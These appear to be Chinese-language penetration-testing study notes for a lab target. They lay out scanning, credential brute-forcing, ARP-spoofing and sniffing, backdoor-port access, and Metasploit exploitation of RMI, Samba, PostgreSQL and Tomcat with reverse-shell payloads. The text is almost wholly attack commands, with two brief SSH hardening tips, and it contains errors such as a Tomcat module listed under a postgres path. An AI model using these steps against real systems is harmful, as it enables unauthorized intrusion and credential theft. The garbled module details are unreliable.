```bash
1.web应用漏洞扫描
1).Owasp-zap(扫描漏洞)
2).nikto(漏洞扫描)
nikto +host +"destip"
3).sqlmap(sql注入)
2.TCP漏洞利用
1).使用Nmap进行端口扫描
nmap -p 21 "destip"
2).使用nc进行ftp链接
nc “destip”
3.TCP密码暴力破解
1).medusa
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
4.TCP用户名明文密码嗅探
1).arpspoof(对正在进行TCP链接的两台机器进行ARP嗅探)
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
2).wireshark(对两台正在进行TCP链接的两台及其进行数据监控进而获取用户名和密码)
5.ssh环境搭建
6.ssh-Banner信息的获取
1).nmap
nmap -sV -p 22 + “destip”
2).metaspolit
2.1).msfconsole以终端的形式启动metaspolit
2.2).use auxiliary/scanner/ssh/ssh_version
2.3).set rhosts 192.168.37.142
2.4).run
3).nc +"destip" +"端口号"
7.通过修改配置文件,可以使别人无法获取ubuntu的版本信息
1).sudo gedit sshd_config
2).重启服务
```
```c
1.ssh弱口令破解
1).medusa
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M mod
2).metasploit
2.1).msfconsole
2.2).使用use auxiliary/scanner/ssh/ssh_login
2.3).set rhosts 192.168.37.142
2.4).set username lzs
2.5).set password 123456
2.6).run
3).通过metasploit获取meterpreter shell
2.ssh漏洞防护
1).修改sshd_config(ctrl+f 搜索port修改ssh的端口)
sudo gedit /etc/sshd_config
3.telnet信息获取
1).使用namp对telnet进行版本获取
nmap -p 23 -sV 192.168.37.142
2).使用metasploit进行版本获取
2.1).msfconsole
2.2).use auxiliary/scanner/telnet/telnet_version
2.3).set rhost 192.168.37.142
2.4).run
4.telnet暴力密码破解
1).使用metasploit进行破解
1.1).msgconsole
1.2).use auxiliary/scanner/telnet/telnet_login
1.3).show options查看需要设置的参数
1.4).set user + 用户名 --设置用户名
1.5).set pass_file + 目标文件 --设置用户字典
1.6).set threads 10 设置线程数
1.7).run 运行
5.rmi漏洞
1).使用nmap进行端口扫描
nmap -p 1099 -sV 192.168.1.9
2).使用metasploit进行漏洞攻击
2.1).msfconsole
2.2).use exploit/multi/misc/java_rmi_server
2.3).set rhost
2.4).set payload java/meterpreter/reverse_tcp
2.5).exploit
6.后门漏洞
1).使用nmap进行端口扫描
nmap -p 1524 -sV 192.168.1.9
2).使用nc进行链接
nc 192.168.1.9 1524
7.nfs漏洞
1).使用nmap端口扫描
nmap -p 2049 192.168.37.142
2).如果nfs配置不当,对方能对本机上的所有文件进行操作
```
```cpp
1.rpcbind信息泄漏
1).nmap对111端口扫描获取信息
nmap -p 111 -sV 192.168.37.142
2).nmap脚本对111进行脚本探测
nmap -p 111 --script=rpcinfo 192.168.37.142
3).metasploit进行端口扫描
3.1).msfconsole
3.2).use auxiliary/scanner/misc/sunrpc_portmapper
3.3).set rhost
3.4).run
2.samba RCE远程命令执行漏洞利用(111端口漏洞)
1).metasploit
1.1).msfconsole
1.2).use exploit/multi/samba/usermap_script
1.3).set rhost
1.4).set payload cmd/unix/reverse
1.5).exploit(获取shell)
3.rlogin最高权限登录(需要目标开放512,513端口)
1).使用namp对512,513端口进行扫描
2).rlogin登录
rlogin -l root 192.168.37.142
1.proftp测试
1.1).namp进行端口扫描
nmap -p 2121 -sV 192.168.37.140
1.2).msf密码破解
1).使用matesploit进行破解
2.mysql弱口令破解
1.1).nmap进行端口扫描
nmap -p 3306 -sV 192.168.37.140
1.2).msf进行密码破解
1.2.1).msfconsole
1.2.2).use auxiliary/scanner/mysql/mysql_login(使用这个模块进行破解)
1.2.3).设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
1.3).通过mysql进行登录
mysql -h 192.168.37.140 -u root
1.4).操作mysql的数据
3.postgresql数据库密码破解
1.1).nmap进行端口扫描
nmap -p 5432 -sV 192.168.37.140
1.2).msf进行暴力破解
1.2.1).msfconsole
1.2.2).use auxiliary/scanner/postgres/postgres_login使用这个模块进行破解)
1.2.3).设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
1.3).使用msf获取shell
1.3.1).msfconsole
1.3.2).use exploit/linux/postgres/postgres_payload 使用这个模块进行破解)
1.3.3).设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
1.3.4).exploit
4.vnc密码破解
searchsploit vnc进行版本漏洞查询
同上面端口漏洞操作步骤!!!
5.irc密码破解
searchsploit irc进行版本漏洞查询
同上面端口漏洞操作步骤!!!
6.tomcat密码破解
1.1).nmap进行端口扫描
nmap -p 8180 -sV 192.168.37.140
1.2).msf进行暴力破解
1.2.1).msfconsole
1.2.2).use auxiliary/scanner/http/tomcat_mgr_login 使用这个模块进行破解)
1.2.3).设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
1.3).使用msf获取shell
1.3.1).msfconsole
1.3.2).use exploit/linux/postgres/tomcat_mgr_deploy 使用这个模块进行破解)
1.3.3).设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
1.3.4).exploit
7.redis密码破解
原理同上
```